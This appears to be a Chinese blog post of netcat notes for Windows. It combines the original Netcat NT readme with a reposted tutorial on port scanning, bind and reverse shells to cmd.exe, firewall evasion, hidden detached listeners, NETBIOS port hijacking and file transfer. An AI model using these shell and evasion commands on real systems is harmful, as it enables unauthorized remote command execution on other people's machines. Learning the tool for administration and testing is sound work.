1. 下載
https://eternallybored.org/misc/netcat/
2. 將目錄添加到環境變量
C:\Work\netcat
3. 簡單實驗
4. 查看說明
UPDATE 12/27/04 security fix in -e option for Windows Netcat 1.11 for NT - nc111nt.zip The original version of Netcat was written by *hobbit* <hobbit@avian.org> The NT version was done by Weld Pond <weld@vulnwatch.org> Netcat for NT is the tcp/ip "Swiss Army knife" that never made it into any of the resource kits. It has proved to be an extremely versatile tool on the unix platform. So why should NT always be unix's poor cousin when it comes to tcp/ip testing and exploration? I bet many NT admins out there keep a unix box around to use tools such as Netcat or to test their systems with the unix version of an NT vulnerability exploit. With Netcat for NT part of that feeling disempowerment is over. Included with this release is Hobbit's original description of the powers of Netcat. In this document I will briefly describe some of the things an NT admin might want to do and know about with Netcat on NT. For more detailed technical information please read hobbit.txt included in the nc11nt.zip archive. Basic Features * Outbound or inbound connections, TCP or UDP, to or from any ports * Full DNS forward/reverse checking, with appropriate warnings * Ability to use any local source port * Ability to use any locally-configured network source address * Built-in port-scanning capabilities, with randomizer * Can read command line arguments from standard input * Slow-send mode, one line every N seconds * Hex dump of transmitted and received data * Ability to let another program service established connections * Telnet-options responder New for NT * Ability to run in the background without a console window * Ability to restart as a single-threaded server to handle a new connection A simple example of using Netcat is to pull down a web page from a web server. With Netcat you get to see the full HTTP header so you can see which web server a particular site is running. Since NT has a rather anemic command processor, some of the things that are easy in unix may be a bit more clunky in NT. For the web page example first create a file get.txt that contains the following line and then a blank line: GET / HTTP/1.0 To use Netcat to retrieve the home page of a web site use the command: nc -v www.website.com 80 < get.txt You will see Netcat make a connection to port 80, send the text contained in the file get.txt, and then output the web server's response to stdout. The -v is for verbose. It tells you a little info about the connection when it starts. It is a bit easier to just open the connection and then type at the console to do the same thing. nc -v www.website.com 80 Then just type in GET / HTTP/1.0 and hit a couple of returns. You will see the same thing as above. A far more exciting thing to do is to get a quick shell going on a remote machine by using the -l or "listen" option and the -e or "execute" option. You run Netcat listening on particular port for a connection. When a connection is made, Netcat executes the program of your choice and connects the stdin and stdout of the program to the network connection. nc -l -p 23 -t -e cmd.exe will get Netcat listening on port 23 (telnet). When it gets connected to by a client it will spawn a shell (cmd.exe). The -t option tells Netcat to handle any telnet negotiation the client might expect. This will allow you to telnet to the machine you have Netcat listening on and get a cmd.exe shell when you connect. You could just as well use Netcat instead of telnet: nc xxx.xxx.xxx.xxx 23 will get the job done. There is no authentication on the listening side so be a bit careful here. The shell is running with the permissions of the process that started Netcat so be very careful. If you were to use the AT program to schedule Netcat to run listening on a port with the -e cmd.exe option, when you connected you would get a shell with user NT AUTHORITY\SYSTEM. The beauty of Netcat really shines when you realize that you can get it listening on ANY port doing the same thing. Do a little exploring and see if the firewall you may be behind lets port 53 through. Run Netcat listening behind the firewall on port 53. nc -L -p 53 -e cmd.exe Then from outside the firewall connect to the listening machine: nc -v xxx.xxx.xxx.xx 53 If you get a command prompt then you are executing commands on the listening machine. Use 'exit' at the command prompt for a clean disconnect. The -L (note the capital L) option will restart Netcat with the same command line when the connection is terminated. This way you can connect over and over to the same Netcat process. A new feature for the NT version is the -d or detach from console flag. This will let Netcat run without an ugly console window cluttering up the screen or showing up in the task list. You can even get Netcat to listen on the NETBIOS ports that are probably running on most NT machines. This way you can get a connection to a machine that may have port filtering enabled in the TCP/IP Security Network control panel. Unlike Unix, NT does not seem to have any security around which ports that user programs are allowed to bind to. This means any user can run a program that will bind to the NETBIOS ports. You will need to bind "in front of" some services that may already be listening on those ports. An example is the NETBIOS Session Service that is running on port 139 of NT machines that are sharing files. You need to bind to a specific source address (one of the IP addresses of the machine) to accomplish this. This gives Netcat priority over the NETBIOS service which is at a lower priority because it is bound to ANY IP address. This is done with the Netcat -s option: nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx Now you can connect to the machine on port 139 and Netcat will field the connection before NETBIOS does. You have effectively shut off file sharing on this machine by the way. You have done this with just user privileges to boot. PROBLEMS with Netcat 1.1 for NT There are a few known problems that will eventually be fixed. One is the -w or timeout option. This works for final net reads but not for connections. Another problem is using the -e option in UDP mode. You may find that some of the features work on Windows 95. Most of the listening features will not work on Windows 95 however. These will be fixed in a later release. Netcat is distributed with full source code so that people can build upon this work. If you add something useful or discover something interesting about NT TCP/IP let met know. Weld Pond <weld@l0pht.com>, 2/2/98
轉帖其他blog
來源: https://blog.csdn.net/sdujava2011/article/details/46968183
1、 掃描指定IP端口情況
2、 端口轉發數據(重點)
3、提交自定義數據包
1、掃描常用命令。
以下IP 處可以使用域名,nc會調用NDS解析成IP地址。
【命令】nc -v ip port
【例如】nc -v 96.44.174.9 80
【解釋】掃瞄某 IP 的某個端口,返回端口信息詳細輸出。
【命令】nc -v -z ip port-port
【例如】nc -v -z 96.44.174.9 80-1024
【解釋】掃描某IP的端口段,返回端口信息詳細輸出,但掃描速度很慢。
【命令】nc -v -z -u ip port-port
【例如】nc -v -z -u 96.44.174.9 25-1024
【解釋】掃描某 IP 的某 UDP 端口段,返回端口信息詳細輸出,但掃描速度很慢。
【命令】nc -nvv -w2 -z ip port-port
【例如】nc -nvv -w2 -z 96.44.174.9 80-1024
【解釋】掃錨某IP的端口段,連接超時時間為2秒。
實例:
總結:使用nc掃描速度真的不敢恭維,而且對於掃描主機存活、端口等還是交給更專業的nmap來進行,物盡其用才是硬道理,這里全當科普。
2、監聽端口、連接端口、轉發端口常用命令。
【命令】nc -l -p 520
【解釋】開啟本機的 TCP 520 端口並監聽次端口的上傳輸的數據。
【命令】nc -l -v -p 520
【解釋】開啟本機的 TCP 520 端口並將監聽到的信息輸出到當前 CMD 窗口。這個命令也是端口轉發shell的基礎。
【命令】nc -l -p 520 > C:/log.dat
【解釋】開啟本機的 TCP 520 端口並將監聽到的信息輸出到 C:/log.dat 下的日志文件里。
【命令】nc -nvv 192.168.1.101 520
【解釋】連接到192.168.1.101主機的 520。
重點一(正向連接):
【遠程運行】nc -l -p 2012 -t -e C:WINDOWSsystem32cmd.exe
【本地運行】nc -nvv 192.168.1.101 2012
【解釋】采用正向連接方式,遠程主機(注:假設IP地址為 192.168.1.101)上運行 nc -l -p 2012 -t -e cmd.exe 意為綁定遠程主機的 CMD 到2012 端口,當本地主機連接遠程主機成功時就會返回給本地主機一個CMD Shell ;在本地主機上運行 nc -nvv 192.168.1.101 2012 用於連接已經將 CMD 重定向到 2012 端口的遠程主機(注:假設IP地址為 192.168.1.101)。
重點二(反向連接):
【本地運行】nc -l –vv -p 2012
【遠程運行】nc -t -e C:WINDOWSsystem32cmd.exe 192.168.1.102 2012
【解釋】采用反向連接方式,先在本地主機(擁有公網IP)運行 nc -l –vv -p 2012 開啟2012 端口並監聽等待遠程主機連接;在遠程主機上運行 nc -t -e cmd.exe 192.168.1.102 2012 將遠程主機的 CMD 重定向到 IP 地址為 192.168.1.102 端口號為2012 的主機上,連接成功后 IP 地址為 192.168.1.102 的主機會得到一個CMD Shell。
總結:這個情況是最常用的內網端口轉發功能,這樣反彈shell即可執行命令。反向連接就是常用的反彈shell到本地,因為由主機主動發送的情況本地防火牆等設備一般不會去攔截,而正向連接到遠程主機的某端口常常被攔截。
實例:
(上面一個cmd是公網IP主機,下圖為筆者本地主機,可以通過目錄看到shell可執行命令)
4、提交數據、文件傳輸常用命令
【命令】nc -vv www.91ri.org port < C:/http.txt
【例如】nc -vv www.91ri.org 80 < C:/http.txt(實測寫為C:\http.txt也可以)
【解釋】提交http.txt內數據包到www.91ri.org的80端口,-vv參數會使速度變慢,但可以跟蹤過程。例如IISput漏洞就可以自定義數據包使用此方法提交。
【命令1】nc -v -n ip port < C:/sunzn.exe
【命令2】nc -v -l -p port > D:/sunzn.exe
【解釋】在本地運行 nc -v -n ip port < C:/sunzn.exe 意為從本地 C 盤根目錄中讀取 sunzn.exe 文件的內容,並把這些數據發送到遠程主機的對應端口上(注:命令行中的 IP 為接收文件的遠程主機 IP ),在遠程主機運行 nc -v -l -p port > D:/sunzn.exe 意為監聽對應端口並把接收到的信息數據寫到 D:/sunzn.exe 中,兩行命令實現了文件在本地主機和遠程主機間的傳輸。
傳輸http數據包實例:
